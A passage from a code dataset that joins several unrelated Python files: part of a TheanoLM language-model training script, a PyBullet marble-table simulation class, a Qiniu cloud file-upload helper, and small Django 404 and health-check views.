'learning rate was decreased), "annealing-count" (default, '
'learning rate is decreased a fixed number of times)')
argument_group.add_argument(
'--min-epochs', metavar='N', type=int, default=1,
help='perform at least N training epochs (default 1)')
argument_group.add_argument(
'--max-epochs', metavar='N', type=int, default=100,
help='perform at most N training epochs (default 100)')
argument_group.add_argument(
'--max-annealing-count', metavar='N', type=int, default=0,
help='when using annealing-count stopping criterion, continue training '
'after decreasing learning rate at most N times (default 0)')
argument_group = parser.add_argument_group("configuration")
argument_group.add_argument(
'--default-device', metavar='DEVICE', type=str, default=None,
help='when multiple GPUs are present, use DEVICE as default')
argument_group = parser.add_argument_group("logging and debugging")
argument_group.add_argument(
'--log-file', metavar='FILE', type=str, default='-',
help='path where to write log file (default is standard output)')
argument_group.add_argument(
'--log-level', metavar='LEVEL', type=str, default='info',
choices=['debug', 'info', 'warn'],
help='minimum level of events to log, one of "debug", "info", "warn" '
'(default "info")')
argument_group.add_argument(
'--log-interval', metavar='N', type=int, default=1000,
help='print statistics of every Nth mini-batch update; quiet if less '
'than one (default 1000)')
argument_group.add_argument(
'--debug', action="store_true",
help='use test values to get better error messages from Theano')
argument_group.add_argument(
'--print-graph', action="store_true",
help='print Theano computation graph')
argument_group.add_argument(
'--profile', action="store_true",
help='enable profiling Theano functions')
argument_group.add_argument(
'--load-and-train', action="store_true",
help='load the weight matrices from the MODEL and retrain')
def _read_vocabulary(args, state):
"""If ``state`` contains data, reads the vocabulary from the HDF5 state.
Otherwise reads a vocabulary file or constructs the vocabulary from the
training set and writes it to the HDF5 state.
If the state does not contain data and --vocabulary argument is given, reads
the vocabulary from the file given after the argument. The rest of the words
in the training set will be added as out-of-shortlist words.
If the state does not contain data and no vocabulary is given, constructs a
vocabulary that contains all the training set words. In that case,
--num-classes argument can be used to control the number of classes.
:type args: argparse.Namespace
:param args: a collection of command line arguments
:type state: hdf5.File
:param state: HDF5 file where the vocabulary should be saved
:rtype: Vocabulary
:returns: the created vocabulary
"""
if state.keys():
logging.info("Reading vocabulary from existing network state.")
result = Vocabulary.from_state(state)
if not result.has_unigram_probs():
# This is for backward compatibility. Remove at some point.
logging.info("Computing unigram word probabilities from training "
"set.")
word_counts = compute_word_counts(args.training_set)
shortlist_words = list(result.id_to_word)
shortlist_set = set(shortlist_words)
oos_words = [x for x in word_counts.keys()
if x not in shortlist_set]
result.id_to_word = numpy.asarray(shortlist_words + oos_words,
dtype=object)
result.word_to_id = {word: word_id
for word_id, word in enumerate(result.id_to_word)}
result.compute_probs(word_counts, update_class_probs=False)
result.get_state(state)
elif args.vocabulary is None:
logging.info("Constructing vocabulary from training set.")
word_counts = compute_word_counts(args.training_set)
result = Vocabulary.from_word_counts(word_counts, args.num_classes)
result.get_state(state)
else:
logging.info("Reading vocabulary from %s.", args.vocabulary)
word_counts = compute_word_counts(args.training_set)
oos_words = word_counts.keys()
with open(args.vocabulary, 'rt', encoding='utf-8') as vocab_file:
result = Vocabulary.from_file(vocab_file,
args.vocabulary_format,
oos_words=oos_words)
if args.vocabulary_format == 'classes':
logging.info("Computing class membership probabilities and unigram "
"probabilities for out-of-shortlist words.")
update_class_probs = True
else:
logging.info("Computing unigram probabilities for out-of-shortlist "
"words.")
update_class_probs = False
result.compute_probs(word_counts,
update_class_probs=update_class_probs)
result.get_state(state)
logging.info("Number of words in vocabulary: %d",
result.num_words())
logging.info("Number of words in shortlist: %d",
result.num_shortlist_words())
logging.info("Number of word classes: %d",
result.num_classes())
return result
def log_options(training_options, optimization_options, args):
"""Writes the command line arguments to debug log.
"""
logging.debug("Training options:")
for option_name, option_value in sorted(training_options.items()):
logging.debug(" %s: %s", option_name, str(option_value))
logging.debug("Optimization options:")
for option_name, option_value in sorted(optimization_options.items()):
logging.debug(" %s=%s", option_name, str(option_value))
logging.debug(" cost_function=%s", args.cost)
logging.debug(" noise_distribution=%s", args.noise_distribution)
logging.debug(" noise_dampening=%d", args.noise_dampening)
logging.debug(" noise_sharing=%s", args.noise_sharing
if args.noise_sharing is not None
else 'no')
logging.debug(" exclude_unk=%s", 'yes' if args.exclude_unk else 'no')
logging.debug(" l1_regularization=%f", args.l1_regularization
if args.l1_regularization is not None
else 0.0)
logging.debug(" l2_regularization=%f", args.l2_regularization
if args.l2_regularization is not None
else 0.0)
logging.debug("Data sampling: %s", str(numpy.array(args.sampling)))
def train(args):
"""A function that performs the "theanolm train" command.
:type args: argparse.Namespace
:param args: a collection of command line arguments
"""
numpy.random.seed(args.random_seed)
log_file = args.log_file
log_level = getattr(logging, args.log_level.upper(), None)
if not isinstance(log_level, int):
print("Invalid logging level requested:", args.log_level)
sys.exit(1)
log_format = '%(asctime)s %(funcName)s: %(message)s'
if args.log_file == '-':
logging.basicConfig(stream=sys.stdout, format=log_format, level=log_level)
else:
logging.basicConfig(filename=log_file, format=log_format, level=log_level)
if args.debug:
theano.config.compute_test_value = 'warn'
logging.info("Enabled computing test values for tensor variables.")
logging.warning("GpuArray backend will fail random number generation!")
else:
theano.config.compute_test_value = 'off'
theano.config.profile = args.profile
theano.config.profile_memory = args.profile
with h5py.File(args.model_path, 'a', driver='core') as state:
vocabulary = _read_vocabulary(args, state)
if args.num_noise_samples > vocabulary.num_classes():
print("Number of noise samples ({}) is larger than the number of "
"classes. This doesn't make sense and would cause unigram "
"sampling to fail.".format(args.num_noise_samples))
sys.exit(1)
num_training_files = len(args.training_set)
if len(args.weights) > num_training_files:
print("You specified more weights than training files.")
sys.exit(1)
weights = numpy.ones(num_training_files).astype(theano.config.floatX)
for index, weight in enumerate(args.weights):
weights[index] = weight
if len(args.sampling) > num_training_files:
print("You specified more sampling coefficients than training "
"files.")
sys.exit(1)
training_options = {
'batch_size': args.batch_size,
'sequence_length': args.sequence_length,
'validation_frequency': args.validation_frequency,
'patience': args.patience,
'stopping_criterion': args.stopping_criterion,
'max_epochs': args.max_epochs,
'min_epochs': args.min_epochs,
'max_annealing_count': args.max_annealing_count
}
optimization_options = {
'method': args.optimization_method,
'epsilon': args.numerical_stability_term,
'gradient_decay_rate': args.gradient_decay_rate,
'sqr_gradient_decay_rate': args.sqr_gradient_decay_rate,
'learning_rate': args.learning_rate,
'weights': weights,
'momentum': args.momentum,
'max_gradient_norm': args.gradient_normalization,
'num_noise_samples': args.num_noise_samples,
'noise_sharing': args.noise_sharing,
}
log_options(training_options, optimization_options, args)
logging.info("Creating trainer.")
trainer = Trainer(training_options, vocabulary, args.training_set,
args.sampling)
trainer.set_logging(args.log_interval)
logging.info("Building neural network.")
if args.architecture == 'lstm300' or args.architecture == 'lstm1500':
architecture = Architecture.from_package(args.architecture)
else:
with open(args.architecture, 'rt', encoding='utf-8') as arch_file:
architecture = Architecture.from_description(arch_file)
default_device = get_default_device(args.default_device)
network = Network(architecture, vocabulary, trainer.class_prior_probs,
default_device=default_device,
profile=args.profile)
network.set_sampling(args.noise_distribution, args.noise_dampening,
args.noise_sharing)
logging.info("Building optimizer.")
exclude_id = vocabulary.word_to_id['<unk>'] if args.exclude_unk \
else None
epsilon = args.numerical_stability_term
if args.cost == 'cross-entropy':
cost_function = CrossEntropyCost(network, exclude_id,
args.l1_regularization,
args.l2_regularization, epsilon)
elif args.cost == 'nce':
cost_function = NCECost(network, exclude_id, args.l1_regularization,
args.l2_regularization, epsilon)
else:
assert args.cost == 'blackout'
cost_function = BlackoutCost(network, exclude_id,
args.l1_regularization,
args.l2_regularization, epsilon)
try:
optimizer = create_optimizer(optimization_options, network,
cost_function, profile=args.profile)
except theano.gradient.DisconnectedInputError as e:
print("Cannot train the neural network because some of the "
"parameters are disconnected from the output. Make sure all "
"the layers are correctly connected in the network "
"architecture. The error message was: `{}´".format(e))
if args.print_graph:
print("Cost function computation graph:")
theano.printing.debugprint(optimizer.gradient_update_function)
trainer.initialize(network, state, optimizer, args.load_and_train)
if args.validation_file is not None:
logging.info("Building text scorer for cross-validation.")
scorer = TextScorer(network, use_shortlist=True,
exclude_unk=args.exclude_unk,
profile=args.profile)
logging.info("Validation text: %s", args.validation_file.name)
validation_mmap = mmap.mmap(args.validation_file.fileno(),
0,
prot=mmap.PROT_READ)
validation_iter = \
LinearBatchIterator(validation_mmap,
vocabulary,
batch_size=args.batch_size,
max_sequence_length=args.sequence_length,
map_oos_to_unk=False)
trainer.set_validation(validation_iter, scorer)
else:
logging.info("Cross-validation will not be performed.")
validation_iter = None
logging.info("Training neural network.")
trainer.train()
if 'layers' not in state.keys():
print("The model has not been trained. No cross-validations were "
"performed or training did not improve the model.")
elif validation_iter is not None:
network.set_state(state)
perplexity = scorer.compute_perplexity(validation_iter)
print("Best validation set perplexity:", perplexity)
|
py | 1a3f9620319bdc533748190bd7a3ad8cf08805bd | from rbw import np
from . import Sim
# TODO document gravity
class MarbleSim(Sim):
"""
Handles physics for `rbw.shapes.MarbleWorld`
Objects with an initial velocity are configured.
Defines a method `make_table` to describe a table top with bounderies along each edge.
"""
def __init__(self, scene_json, client):
self.client = client
self.world = scene_json
#-------------------------------------------------------------------------#
# Attributes
@property
def client(self):
return self._client
@client.setter
def client(self, cid):
if cid < 0:
raise ValueError('Client is offline')
self._client = cid
@property
def world(self):
return self._world
@world.setter
def world(self, w):
self.resetSimulation()
self.setGravity(0, 0, -10)
self.make_table(w['table'])
init_force = w['init_force']
d = {}
for obj,data in w['objects'].items():
d[obj] = self.make_obj(data)
if obj in w['init_force']:
f = init_force[obj]
self.applyExternalForce(d[obj], -1, f, [0,0,0],self.LINK_FRAME)
self._world = d
#-------------------------------------------------------------------------#
# Methods
def make_table(self, params):
# Table top
base_id = self.make_obj(params)
# table walls
shape = self.GEOM_BOX
exs = np.array(params['dims']) / 2.0
rot = self.getQuaternionFromEuler((np.pi/2, 0, 0))
wall_left = self.createCollisionShape(shape, halfExtents = exs)
pos_left = [0, exs[1] + exs[2], 0]
obj_id = self.createMultiBody(baseCollisionShapeIndex = wall_left,
basePosition = pos_left,
baseOrientation = rot)
self.update_obj(obj_id, params)
pos_right = [0, -1 * (exs[1] + exs[2]), 0]
wall_right = self.createCollisionShape(shape, halfExtents = exs)
obj_id = self.createMultiBody(baseCollisionShapeIndex = wall_right,
basePosition = pos_right,
baseOrientation = rot)
self.update_obj(obj_id, params)
pos_front = [(exs[1] + exs[2]), 0, 0]
rot = self.getQuaternionFromEuler((0, np.pi/2, 0))
wall_front = self.createCollisionShape(shape, halfExtents = exs)
obj_id = self.createMultiBody(baseCollisionShapeIndex = wall_front,
basePosition = pos_front,
baseOrientation = rot,)
self.update_obj(obj_id, params)
pos_back = [-1*(exs[1] + exs[2]), 0, 0]
wall_back = self.createCollisionShape(shape, halfExtents = exs)
obj_id = self.createMultiBody(baseCollisionShapeIndex = wall_back,
basePosition = pos_back,
baseOrientation = rot,)
self.update_obj(obj_id, params)
return base_id
|
py | 1a3f976dae6edfce0061348c37c99d309ccd9008 | from qiniu import Auth, put_file
from common import config
def upload(file_name, file_path):
"""
本地文件上传至七牛云
:param file_name:
:param file_path:
:return:
"""
# 构建鉴权对象
qn_auth = Auth(config.QN_ACCESS_KEY, config.QN_SECRET_KEY)
# 生成上传 Token,可以指定过期时间等
token = qn_auth.upload_token(config.QN_BUCKET_NAME, file_name, 3600)
ret, info = put_file(token, file_name, file_path)
return ret, info
|
py | 1a3f978c11f5c545982fb5039dd1cc57dfacaa46 | from django.http import HttpResponse
from django.shortcuts import render
def handle_not_fonud(request, exception=None):
"""Handler for 404"""
return render(request, '404.html', status=404)
def health(request):
"""Health Check API"""
return HttpResponse('ok')
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.